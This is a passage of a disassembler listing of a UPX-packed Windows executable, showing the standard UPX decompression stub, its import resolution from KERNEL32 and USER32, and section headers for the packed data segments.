dd 2464722Eh, 2FAFB61h, 5F61775h, 40272223h, 0C0B72E02h
dd 1026EECEh, 1673021Ch, 5BE59E41h, 6C654FC0h, 501A636Fh
dd 929BF6CFh, 0A41B4226h, 2F4A2332h, 0E0000000h, 51h, 0FF000090h
dd 2 dup(0)
; =============== S U B R O U T I N E =======================================
public start
start proc near
var_AC = byte ptr -0ACh
pusha
mov esi, offset dword_406000
lea edi, [esi-5000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_4071E2
; ---------------------------------------------------------------------------
align 8
loc_4071D8: ; CODE XREF: start:loc_4071E9�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_4071DE: ; CODE XREF: start+B6�j start+CD�j
add ebx, ebx
jnz short loc_4071E9
loc_4071E2: ; CODE XREF: start+10�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_4071E9: ; CODE XREF: start+20�j
jb short loc_4071D8
mov eax, 1
loc_4071F0: ; CODE XREF: start+3F�j start+4A�j
add ebx, ebx
jnz short loc_4071FB
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_4071FB: ; CODE XREF: start+32�j
adc eax, eax
add ebx, ebx
jnb short loc_4071F0
jnz short loc_40720C
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_4071F0
loc_40720C: ; CODE XREF: start+41�j
xor ecx, ecx
sub eax, 3
jb short loc_407220
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_407292
mov ebp, eax
loc_407220: ; CODE XREF: start+51�j
add ebx, ebx
jnz short loc_40722B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_40722B: ; CODE XREF: start+62�j
adc ecx, ecx
add ebx, ebx
jnz short loc_407238
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_407238: ; CODE XREF: start+6F�j
adc ecx, ecx
jnz short loc_40725C
inc ecx
loc_40723D: ; CODE XREF: start+8C�j start+97�j
add ebx, ebx
jnz short loc_407248
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_407248: ; CODE XREF: start+7F�j
adc ecx, ecx
add ebx, ebx
jnb short loc_40723D
jnz short loc_407259
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_40723D
loc_407259: ; CODE XREF: start+8E�j
add ecx, 2
loc_40725C: ; CODE XREF: start+7A�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_40727C
loc_40726D: ; CODE XREF: start+B4�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_40726D
jmp loc_4071DE
; ---------------------------------------------------------------------------
align 4
loc_40727C: ; CODE XREF: start+AB�j start+C9�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_40727C
add edi, ecx
jmp loc_4071DE
; ---------------------------------------------------------------------------
loc_407292: ; CODE XREF: start+5C�j
pop esi
mov edi, esi
mov ecx, 0A3h
loc_40729A: ; CODE XREF: start+E1�j start+E6�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_40729F: ; CODE XREF: start+104�j
cmp al, 1
ja short loc_40729A
cmp byte ptr [edi], 1
jnz short loc_40729A
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov al, bl
loop loc_40729F
lea edi, [esi+5000h]
loc_4072CC: ; CODE XREF: start+12E�j
mov eax, [edi]
or eax, eax
jz short loc_40730E
mov ebx, [edi+4]
lea eax, [eax+esi+7000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+703Ch]
xchg eax, ebp
loc_4072E9: ; CODE XREF: start+146�j
mov al, [edi]
inc edi
or al, al
jz short loc_4072CC
mov ecx, edi
push edi
dec eax
repne scasb
push ebp
call dword ptr [esi+7040h]
or eax, eax
jz short loc_407308
mov [ebx], eax
add ebx, 4
jmp short loc_4072E9
; ---------------------------------------------------------------------------
loc_407308: ; CODE XREF: start+13F�j
call dword ptr [esi+7048h]
loc_40730E: ; CODE XREF: start+110�j
add edi, 4
lea ebx, [esi-4]
loc_407314: ; CODE XREF: start+170�j
xor eax, eax
mov al, [edi]
inc edi
or eax, eax
jz short loc_40733F
cmp al, 0EFh
ja short loc_407332
loc_407321: ; CODE XREF: start+17D�j
add ebx, eax
mov eax, [ebx]
xchg al, ah
rol eax, 10h
xchg al, ah
add eax, esi
mov [ebx], eax
jmp short loc_407314
; ---------------------------------------------------------------------------
loc_407332: ; CODE XREF: start+15F�j
and al, 0Fh
shl eax, 10h
mov ax, [edi]
add edi, 2
jmp short loc_407321
; ---------------------------------------------------------------------------
loc_40733F: ; CODE XREF: start+15B�j
mov ebp, [esi+7044h]
lea edi, [esi-1000h]
mov ebx, 1000h
push eax
push esp
push 4
push ebx
push edi
call ebp
lea eax, [edi+1EFh]
and byte ptr [eax], 7Fh
and byte ptr [eax+28h], 7Fh
pop eax
push eax
push esp
push eax
push ebx
push edi
call ebp
pop eax
popa
lea eax, [esp+2Ch+var_AC]
loc_407373: ; CODE XREF: start+1B7�j
push 0
cmp esp, eax
jnz short loc_407373
sub esp, 0FFFFFF80h
jmp sub_402951
start endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 1000h
UPX1 ends
; Section 3. (virtual address 00008000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00008000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
UPX2 segment para public 'DATA' use32
assume cs:UPX2
;org 408000h
dd 3 dup(0)
dd 8058h, 803Ch, 3 dup(0)
dd 8065h, 8050h, 5 dup(0)
dd 77E805D8h, 77E7A5FDh, 77E6169Ah, 77E75CB5h, 0
aJW db 'jÉÔw',0
align 4
aKernel32_dll db 'KERNEL32.DLL',0
aUser32_dll db 'USER32.dll',0
dd 6F4C0000h, 694C6461h, 72617262h, 4179h, 50746547h, 41636F72h
dd 65726464h, 7373h, 74726956h, 506C6175h, 65746F72h, 7463h
dd 74697845h, 636F7250h, 737365h, 73770000h, 6E697270h
dd 416674h, 7000h, 0Ch, 31C2h, 3CFh dup(0)
UPX2 ends
; Section 4. (virtual address 00009000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00009000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 409000h
align 2000h
_idata2 ends
end start